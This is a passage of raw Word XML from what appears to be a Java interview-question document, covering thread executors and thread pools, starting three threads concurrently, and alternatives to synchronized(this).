          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Thread Executors</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> provide a higher-level replacement for the traditional way of managing threads using Thread or Runnable. They manage the creation, execution, and scheduling of threads in a more flexible and efficient way. Executors are part of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>java.util.concurrent</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> package, and they help improve the performance and scalability of applications that involve multithreading.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2329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Benefits of Using Thread Executors:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38EF5361"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Pooling</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Executors manage a pool of threads, so that the overhead of creating new threads for every task is avoided.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505E8B47"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ask Scheduling</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Executors can manage tasks in a way that avoids issues like thread starvation or resource contention.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5611F0DE"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Reusability</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Executors allow threads to be reused, reducing the overhead of thread creation and destruction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095258D5"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etter Resource Management</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Executors provide better management and utilization of system resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3726913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ypes of Executors in Java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9E8AE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re are several implementations of the Executor interface provided in the java.util.concurrent package. Let's discuss the most commonly used ones:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2644A806"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xecutor Interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32EEC6A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 interface provides a simple mechanism to submit tasks for execution. It has a single method:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D487BD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void execute(Runnable command);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C2D7C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interface is very simple and doesn't return any result. It only executes the task.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDC680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ExecutorService Interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9079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ubmit(Callable&lt;T&gt; task) — Submits a task for execution and returns a Future object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66CC1DF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vokeAll(Collection&lt;? extends Callable&lt;T&gt;&gt; tasks) — Executes a collection of tasks and returns a list of Future objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA5F83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 — Initiates an orderly shutdown where previously submitted tasks are executed, but no new tasks will be accepted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2FAAAC"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Now() — Attempts to stop all actively executing tasks, halts the processing of waiting tasks, and returns a list of the tasks that were waiting to be executed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B362C7"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PoolExecutor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E11B0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onfigure the thread pool with parameters like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B1E071"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corePoolSize</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The number of threads to keep in the pool, even if they are idle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AFC05AC"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maximumPoolSize</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The maximum number of threads allowed in the pool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41728149"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keepAliveTime</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The time for which an idle thread should wait before terminating.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D69347"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lockingQueue</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A queue to hold tasks before they are executed by threads in the pool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22DCE8C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n example of using ThreadPoolExecutor:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FDA056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A0E6A0E" w14:textId="77777777" w:rsidR="00761FB8" w:rsidRPr="00414276" w:rsidRDefault="00761FB8" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56077DE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adPoolExecutorExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78766A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1D6F6D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thread pool with 2 core threads and a maximum of 4 threads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC844A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 = new ThreadPoolExecutor(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43FDF36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2, 4, 60, TimeUnit.SECONDS, new LinkedBlockingQueue&lt;Runnable&gt;()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006FE6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FFBD004" w14:textId="77777777" w:rsidR="00761FB8" w:rsidRPr="00414276" w:rsidRDefault="00761FB8" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A681E3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a task to the executor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675B22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ubmit(() -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E58CCB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by: " + Thread.currentThread().getName());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB2A62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39C206C" w14:textId="77777777" w:rsidR="00761FB8" w:rsidRPr="00414276" w:rsidRDefault="00761FB8" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3794A04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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD6BEB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hutdown();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585EEE9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F3B9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D168E0A"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ScheduledExecutorService</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2553DB8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Runnable command, long delay, TimeUnit unit) — Schedules a task to run after a specified delay.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA4E0F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AtFixedRate(Runnable command, long initialDelay, long period, TimeUnit unit) — Schedules a task to run at a fixed-rate periodic interval.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43571B0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WithFixedDelay(Runnable command, long initialDelay, long delay, TimeUnit unit) — Schedules a task to run with a fixed-delay interval between the end of the last execution and the start of the next.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB4B75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using ScheduledExecutorService:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E9FEE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75E511F9" w14:textId="77777777" w:rsidR="00761FB8" w:rsidRPr="00414276" w:rsidRDefault="00761FB8" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FEF7BC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cheduledExecutorServiceExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516CB17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51E0641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dExecutorService scheduler = Executors.newScheduledThreadPool(1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286D967C" w14:textId="77777777" w:rsidR="00761FB8" w:rsidRPr="00414276" w:rsidRDefault="00761FB8" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F32E6B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fter a 2-second delay</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECADCB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 -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3783371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at: " + System.currentTimeMillis());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE483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2, TimeUnit.SECONDS);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C920CC4" w14:textId="77777777" w:rsidR="00761FB8" w:rsidRPr="00414276" w:rsidRDefault="00761FB8" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A0088D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t a fixed-rate (every 3 seconds)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118E0DC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AtFixedRate(() -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B2455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periodically at: " + System.currentTimeMillis());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1AABC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0, 3, TimeUnit.SECONDS);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3C488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B76A7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37B2D25"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Executors Utility Class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177FB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s utility class provides factory methods to create commonly used executor service implementations. For example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D6774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FixedThreadPool(int nThreads) — Creates a thread pool that reuses a fixed number of threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76AB718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CachedThreadPool() — Creates a thread pool that creates new threads as needed but reuses idle threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A303159"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ingleThreadExecutor() — Creates an executor that uses a single worker thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E1F861"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cheduledThreadPool(int corePoolSize) — Creates a thread pool for scheduling tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19025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creating a fixed thread pool:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A67576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executor = Executors.newFixedThreadPool(3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3991807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ExecutorService for Concurrency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DFADC0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BD6ECBA" w14:textId="77777777" w:rsidR="00761FB8" w:rsidRPr="00414276" w:rsidRDefault="00761FB8" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F4477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public class ExecutorServiceExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40AF4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1FDAAA0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Service = Executors.newFixedThreadPool(3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B9F4BC" w14:textId="77777777" w:rsidR="00761FB8" w:rsidRPr="00414276" w:rsidRDefault="00761FB8" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52EEA57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5 tasks to the executor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284F9A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5; i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E354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ubmit(() -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1F79B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started by: " + Thread.currentThread().getName());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8D216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6746F74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2000); // Simulate a task</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28896BF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3AFF77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currentThread().interrupt();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A8F52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D281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finished by: " + Thread.currentThread().getName());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC500C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BC4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836A3A1" w14:textId="77777777" w:rsidR="00761FB8" w:rsidRPr="00414276" w:rsidRDefault="00761FB8" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13303F1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 after all tasks are completed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF21D6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hutdown();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5E67B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3BD778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6A02C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Methods of ExecutorService</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69CB668E"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ubmit()</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Accepts a Runnable or Callable and returns a Future object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2A35DF"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ll()</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Executes a collection of tasks and waits for all of them to complete.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D616F25"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ny()</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Executes a collection of tasks and returns the result of the first completed task.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF1D50D"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w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Initiates an orderly shutdown of the executor, rejecting any new tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4187422B"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Now()</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Attempts to stop all actively executing tasks and halts the processing of tasks waiting in the queue.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D023B91"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59B4229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 Executors in Java provide a powerful and efficient way to handle concurrency. They abstract away the complexity of managing individual threads and offer more advanced features like thread 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3" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7493BC3B" w14:textId="77777777" w:rsidR="003A750E" w:rsidRPr="00CE4B95" w:rsidRDefault="003A750E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="304" w:name="_Toc197867518"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How to create three threads so that it will execute simultaneously?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="304"/>
    </w:p>
    <w:p w14:paraId="7A5B6A82" w14:textId="4E000B87" w:rsidR="00CE5D34" w:rsidRPr="00414276" w:rsidRDefault="00CE5D34"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Thread Class:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A51780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reate three Thread objects and start them:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5276301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Thread extends Thread {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1F6E6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FDBE21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517CDF9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3E9BC61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90BD07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554A9E68" w14:textId="77777777" w:rsidR="00CE5D34" w:rsidRPr="00414276" w:rsidRDefault="00CE5D34" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AABE8CE"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200EE55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6808DB8"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC9D39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1 = new MyThread();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C80CF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2 = new MyThread();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A6654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3 = new MyThread();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38873C51" w14:textId="77777777" w:rsidR="00CE5D34" w:rsidRPr="00414276" w:rsidRDefault="00CE5D34" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3721B0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228711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thread1.start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32BD85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2BA4D7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6DF0E1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D09C2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A797D75"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Runnable Interface:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71CEA9F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lternatively, you can create a Runnable object and pass it to Thread objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205C9A3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Runnable implements Runnable {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B941BB3"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BF769F6"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7DA8C43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4E7CD84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68336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36F7F" w14:textId="77777777" w:rsidR="00CE5D34" w:rsidRPr="00414276" w:rsidRDefault="00CE5D34" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="546906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5C31BC6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B1616B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runnable task</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1972F72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unnable task = new MyRunnable();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A813AE8" w14:textId="77777777" w:rsidR="00CE5D34" w:rsidRPr="00414276" w:rsidRDefault="00CE5D34" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7ABDD40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 with the runnable task</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7B48F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1 = new Thread(task);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17ABD9E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2 = new Thread(task);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D3D53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3 = new Thread(task);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A6F4A5" w14:textId="77777777" w:rsidR="00CE5D34" w:rsidRPr="00414276" w:rsidRDefault="00CE5D34" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B04461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4E01CCC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1.start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3619C1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152B3D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36D0A0D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8130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BEDE17"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015AFD96"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Class</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You can extend the Thread class by overriding its run() method. When you call start() on a thread, the run() method is executed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ABF262E"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Runnable Interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Alternatively, you can implement the Runnable interface, which also requires you to define the run() method. Then, you can pass the Runnable instance to a Thread and start the thread by calling start().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32287F84"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How Java Executes Threads:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B0B0E6"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you call start() on a thread, the JVM assigns the thread to an available CPU core (or time slice if there is only one core).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537F43C1"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run concurrently, so the exact order of execution is managed by the JVM scheduler.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54571D53"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s will run "simultaneously" if there are multiple CPU cores available.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0CEDAB"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ected Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64067DE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utput will vary in terms of the order in which the threads are executed because the JVM scheduler decides the execution sequence. Here's an example of what the output might look like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6818FD6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0 is executing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BD52C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1 is executing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="771C416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2 is executing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1206DCD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rder can differ with each execution, as the JVM may schedule the threads in any order.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C533A30"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Notes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FEC169C"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may not always execute exactly simultaneously on a single-core machine, as the CPU time is sliced between threads. On multi-core machines, they can run simultaneously on different cores.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2C29F9"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VM's thread scheduler controls when each thread is executed, and it may switch between them depending on factors like priority, I/O operations, or the availability of CPU resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4C5466" w14:textId="63FAB0C5"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4" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D786075" w14:textId="77777777" w:rsidR="00C134A5" w:rsidRPr="00CE4B95" w:rsidRDefault="00C134A5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="305" w:name="_Toc197867519"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>What can we replace instead of this keyword in the statement? synchronized(this) {?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="305"/>
    </w:p>
    <w:p w14:paraId="3213DD42" w14:textId="33146F65" w:rsidR="00CE5D34" w:rsidRPr="00414276" w:rsidRDefault="00CE5D34"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Here are some alternatives:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F97C49C"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a Specific Lock Object (Custom Lock):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5E660B"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this, you can use a specific object for synchronization. This is a common practice to avoid potential deadlocks or unnecessary synchronization on the instance itself.</w:t>
